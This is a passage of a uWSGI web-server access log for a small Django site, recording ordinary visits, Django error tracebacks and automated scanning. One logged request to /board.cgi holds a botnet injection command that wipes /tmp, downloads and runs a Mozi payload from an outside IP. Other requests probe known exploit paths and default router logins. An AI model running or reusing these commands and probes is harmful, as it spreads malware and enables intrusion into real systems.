Jan 9 10:17:07 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 647/898] 49.234.4.227 () {24 vars in 299 bytes} [Sat Jan 9 10:17:07 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 648/899] 46.245.46.147 () {28 vars in 403 bytes} [Sat Jan 9 10:18:57 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 649/900] 212.64.18.182 () {28 vars in 320 bytes} [Sat Jan 9 11:27:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 650/901] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 11:33:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 651/902] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 12:11:00 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 652/903] 45.184.17.98 () {28 vars in 409 bytes} [Sat Jan 9 12:38:11 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 653/904] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 12:48:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 654/905] 219.228.146.245 () {38 vars in 813 bytes} [Sat Jan 9 12:52:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 655/906] 219.228.146.245 () {48 vars in 936 bytes} [Sat Jan 9 12:52:36 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1) +[pid: 18965|app: 0|req: 656/907] 219.228.146.245 () {40 vars in 865 bytes} [Sat Jan 9 12:52:36 2021] GET /home/ => generated 8646 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 657/908] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 12:52:38 2021] GET /single-an-1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 658/909] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 12:52:38 2021] GET /single-an-1/ => generated 3045 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 659/910] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 12:52:53 2021] GET /all-0-0-0 => generated 9504 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/911] 219.228.146.245 () {40 vars in 909 bytes} [Sat Jan 9 12:52:53 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/912] 219.228.146.245 () {40 vars in 885 bytes} [Sat Jan 9 12:52:53 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 660/913] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 12:53:00 2021] GET /single/7/ => generated 8331 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 661/914] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 12:53:37 2021] GET /single/6/ => generated 8830 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/915] 219.228.146.245 () {40 vars in 957 bytes} [Sat Jan 9 12:53:38 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 662/916] 193.118.53.202 () {30 vars in 438 bytes} [Sat Jan 9 13:30:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 663/917] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 14:10:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 664/918] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 14:52:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 665/919] 13.52.186.81 () {30 vars in 446 bytes} [Sat Jan 9 15:30:15 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 666/920] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 15:30:53 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 667/921] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 16:13:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 668/922] 101.32.185.202 () {22 vars in 236 bytes} [Sat Jan 9 16:15:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html/ +[pid: 18965|app: 0|req: 669/923] 101.32.185.202 () {24 vars in 304 bytes} [Sat Jan 9 16:15:33 2021] GET /manager/html/ => generated 3404 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 670/924] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 16:55:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 671/925] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 17:04:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /board.cgi +[pid: 18965|app: 0|req: 672/926] 42.228.41.21 () {22 vars in 433 bytes} [Sat Jan 9 17:47:12 2021] GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://42.228.41.21:45718/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron => generated 3488 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 673/927] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 18:11:45 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 674/928] 182.254.152.219 () {22 vars in 236 bytes} [Sat Jan 9 18:21:07 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 675/929] 182.254.152.219 () {24 vars in 302 bytes} [Sat Jan 9 18:21:07 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 676/930] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 18:48:33 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 677/931] 51.158.116.248 () {22 vars in 236 bytes} [Sat Jan 9 18:57:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 678/932] 51.158.116.248 () {24 vars in 301 bytes} [Sat Jan 9 18:57:33 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 679/933] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 19:24:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /admin-scripts.asp +[pid: 18965|app: 0|req: 680/934] 195.24.65.111 () {28 vars in 458 bytes} [Sat Jan 9 19:58:13 2021] GET /admin-scripts.asp => generated 3410 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /admin-scripts.asp +[pid: 18965|app: 0|req: 681/935] 195.24.65.111 () {28 vars in 458 bytes} [Sat Jan 9 19:58:14 2021] GET /admin-scripts.asp => generated 3410 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 682/936] 83.97.20.34 () {26 vars in 278 bytes} [Sat Jan 9 20:16:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 683/937] 198.20.124.218 () {30 vars in 438 bytes} [Sat Jan 9 20:28:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 684/938] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 20:39:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 685/939] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 21:14:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 686/940] 187.108.78.110 () {28 vars in 404 bytes} [Sat Jan 9 21:25:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 687/941] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 21:51:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /seeyon/htmlofficeservlet +[pid: 18965|app: 0|req: 688/942] 106.75.137.63 () {30 vars in 532 bytes} [Sat Jan 9 22:05:00 2021] GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /secure/ContactAdministrators!default.jspa +[pid: 18965|app: 0|req: 689/943] 106.75.137.63 () {30 vars in 520 bytes} [Sat Jan 9 22:05:00 2021] GET /secure/ContactAdministrators!default.jspa => generated 3487 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /weaver/bsh.servlet.BshServlet +[pid: 18965|app: 0|req: 690/944] 106.75.137.63 () {30 vars in 496 bytes} [Sat Jan 9 22:05:00 2021] GET /weaver/bsh.servlet.BshServlet => generated 3451 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /solr/ +[pid: 18965|app: 0|req: 691/945] 106.75.137.63 () {30 vars in 448 bytes} [Sat Jan 9 22:05:00 2021] GET /solr/ => generated 3379 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /console/login/LoginForm.jsp +[pid: 18965|app: 0|req: 692/946] 106.75.137.63 () {30 vars in 492 bytes} [Sat Jan 9 22:05:00 2021] GET /console/login/LoginForm.jsp => generated 3445 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 693/947] 106.75.137.63 () {30 vars in 477 bytes} [Sat Jan 9 22:05:00 2021] GET /manager/html => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /axis2/axis2-admin/login +[pid: 18965|app: 0|req: 694/948] 106.75.137.63 () {34 vars in 520 bytes} [Sat Jan 9 22:05:00 2021] POST /axis2/axis2-admin/login => generated 3434 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 695/949] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 22:27:01 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 696/950] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 23:21:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 697/951] 179.52.154.19 () {22 vars in 235 bytes} [Sat Jan 9 23:53:56 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 698/952] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 00:13:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 699/953] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 01:17:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 700/954] 101.32.12.80 () {22 vars in 233 bytes} [Sun Jan 10 01:18:07 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html/ +[pid: 18965|app: 0|req: 701/955] 101.32.12.80 () {24 vars in 301 bytes} [Sun Jan 10 01:18:07 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /config/getuser +[pid: 18965|app: 0|req: 702/956] 209.141.46.241 () {36 vars in 618 bytes} [Sun Jan 10 02:01:29 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 703/957] 192.241.223.179 () {30 vars in 343 bytes} [Sun Jan 10 02:04:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 704/958] 220.133.1.18 () {36 vars in 499 bytes} [Sun Jan 10 02:06:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 705/959] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 02:32:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 18965|app: 0|req: 706/960] 89.248.168.108 () {22 vars in 226 bytes} [Sun Jan 10 03:24:01 2021] HEAD / => generated 52528 bytes in 23 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 707/961] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 03:36:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 708/962] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 04:58:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /boaform/admin/formLogin +[pid: 18965|app: 0|req: 709/963] 14.232.134.127 () {22 vars in 317 bytes} [Sun Jan 10 05:09:10 2021] GET /boaform/admin/formLogin?username=user&psd=user => generated 3461 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 710/964] 83.97.20.34 () {26 vars in 278 bytes} [Sun Jan 10 06:15:32 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 711/965] 183.136.225.35 () {30 vars in 411 bytes} [Sun Jan 10 06:25:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 712/966] 183.136.225.35 () {32 vars in 472 bytes} [Sun Jan 10 06:26:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[uwsgi-http key: sd4404386.adsl.online.nl client_addr: 183.136.225.35 client_port: 19559] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +[pid: 18965|app: 0|req: 713/967] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 06:43:28 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 714/968] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 07:29:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /config/getuser +[pid: 18965|app: 0|req: 715/969] 185.132.53.63 () {36 vars in 617 bytes} [Sun Jan 10 07:57:59 2021] GET /config/getuser?index=0 => generated 3414 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 716/970] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 08:08:02 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 717/971] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 08:53:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 18965|app: 0|req: 718/972] 89.248.168.108 () {22 vars in 227 bytes} [Sun Jan 10 09:06:13 2021] HEAD / => generated 52529 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 719/973] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 09:37:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 720/974] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 10:17:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 721/975] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 10:58:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 722/976] 117.100.100.38 () {40 vars in 1026 bytes} [Sun Jan 10 11:23:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/977] 117.100.100.38 () {40 vars in 963 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/978] 117.100.100.38 () {40 vars in 959 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/979] 117.100.100.38 () {40 vars in 981 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/980] 117.100.100.38 () {40 vars in 961 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/981] 117.100.100.38 () {40 vars in 967 bytes} [Sun Jan 10 11:23:48 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/982] 117.100.100.38 () {40 vars in 942 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/983] 117.100.100.38 () {40 vars in 956 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/984] 117.100.100.38 () {40 vars in 958 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/985] 117.100.100.38 () {40 vars in 940 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/986] 117.100.100.38 () {40 vars in 948 bytes} [Sun Jan 10 11:23:48 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/987] 117.100.100.38 () {40 vars in 1052 bytes} [Sun Jan 10 11:23:50 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/988] 117.100.100.38 () {40 vars in 1058 bytes} [Sun Jan 10 11:23:50 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/989] 117.100.100.38 () {40 vars in 1020 bytes} [Sun Jan 10 11:23:51 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 723/990] 61.129.7.235 () {32 vars in 535 bytes} [Sun Jan 10 11:29:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/991] 61.129.7.235 () {34 vars in 672 bytes} [Sun Jan 10 11:29:29 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/992] 61.129.7.235 () {34 vars in 668 bytes} [Sun Jan 10 11:30:40 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/993] 61.129.7.235 () {34 vars in 712 bytes} [Sun Jan 10 11:31:31 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/994] 61.129.7.235 () {34 vars in 640 bytes} [Sun Jan 10 11:32:11 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/995] 61.129.7.235 () {34 vars in 632 bytes} [Sun Jan 10 11:32:52 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 724/996] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 11:36:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 725/997] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 12:20:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 726/998] 167.114.240.100 () {22 vars in 236 bytes} [Sun Jan 10 12:40:33 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html/ +[pid: 18965|app: 0|req: 727/999] 167.114.240.100 () {24 vars in 304 bytes} [Sun Jan 10 12:40:34 2021] GET /manager/html/ => generated 3404 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 728/1000] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 13:05:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +...The work of process 18965 is done. Seeya! +worker 1 killed successfully (pid: 18965) +Respawned uWSGI worker 1 (new pid: 12823) +[pid: 12823|app: 0|req: 729/1001] 177.200.16.10 () {28 vars in 403 bytes} [Sun Jan 10 13:19:47 2021] GET / => generated 6416 bytes in 177 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 12823|app: 0|req: 730/1002] 37.46.150.7 () {22 vars in 224 bytes} [Sun Jan 10 13:22:17 2021] HEAD / => generated 52526 bytes in 88 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 731/1003] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 13:52:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 732/1004] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 13:52:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 733/1005] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 14:35:41 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /manager/html +[pid: 12823|app: 0|req: 734/1006] 156.96.155.229 () {30 vars in 455 bytes} [Sun Jan 10 14:55:39 2021] GET /manager/html => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 735/1007] 83.97.20.21 () {26 vars in 278 bytes} [Sun Jan 10 16:02:57 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1008] 113.96.198.16 () {28 vars in 352 bytes} 